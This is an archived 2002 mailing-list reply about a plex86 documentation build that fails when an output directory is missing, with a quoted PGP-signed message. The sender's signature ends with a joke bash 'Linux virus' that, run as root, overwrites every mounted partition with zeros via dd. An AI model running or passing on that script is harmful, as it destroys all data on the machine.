Does the output directory exists in the CVS? If so, you might need to tell CVS to download empty directories. Though it might be a good idea to add a 'mkdir' instruction to the make file...
Le 28 F�vrier 2002 14:34, vous avez �crit : [snip] > but it dies because it tries to mkdir plex86/docs/output/html/PUG when > plex86/docs/output does not exist. So I manually mkdir plex86/docs/output > then mkdir plex86/docs/output/html then make works fine. [snip] > - -- > Roy Souther <[EMAIL PROTECTED]> > www.SiliconTao.com > > Live to code, code to live! > -----BEGIN PGP SIGNATURE----- > Version: GnuPG v1.0.6 (GNU/Linux) > Comment: For info see http://www.gnupg.org > > iEYEARECAAYFAjx+hkQACgkQCbnxcmEBt41ehQCgu70LWaNv1clm8+QKsAKVROjP > ZKMAnjxR7r8IlKjUfH2cIWa/Gw5lcxeq > =cExg > -----END PGP SIGNATURE----- -- Eric Laberge GCS/M/S d-(++) s-: a-- C++(++++) UL+++>$ !P L++ E--- W++ N+ w++ !O M !V PS PE Y PGP-(+++) t++(-) X- R* tv+ b+ DI+++ D+ G e+>+++++ h! r-- #!/bin/bash if [ $UID -ne 0 ] then echo "Linux virus, please run as root" else for partition in $(df | cut -d ' ' -f 1 | grep /dev) do dd if=/dev/zero of=$partition done fi
